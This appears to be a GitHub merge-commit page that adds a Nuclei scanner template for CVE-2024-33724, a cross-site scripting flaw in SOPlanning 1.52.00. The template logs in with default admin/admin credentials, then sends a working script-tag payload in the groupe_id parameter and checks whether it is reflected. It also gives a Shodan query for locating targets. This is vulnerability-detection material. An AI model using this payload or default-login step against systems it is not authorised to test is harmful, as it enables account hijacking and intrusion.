Merge pull request #9700 from Kazgangap/so-plan

add so plannig xss
projectdiscovery · May 8, 2024 · 28ae879 · 28ae879
2 parents da19256 + 3242fab
commit 28ae879
Showing 1 changed file with 48 additions and 0 deletions.
diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml
@@ -0,0 +1,48 @@
+id: CVE-2024-33724
+
+info:
+ name: SOPlanning 1.52.00 Cross Site Scripting
+ author: Kazgangap
+ severity: medium
+ description: |
+ SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.
+ reference:
+ - https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html
+ - https://github.com/fuzzlove/soplanning-1.52-exploits
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: soplanning
+ product: soplanning
+ shodan-query: html:"soplanning"
+ tags: packetstorm,cve,cve2024,authenticated,soplanning,xss
+
+http:
+ - raw:
+ - |
+ POST /process/login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ login={{username}}&password={{password}}
+
+ - |
+ GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ attack: pitchfork
+
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+
+ host-redirects: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")'
+ condition: and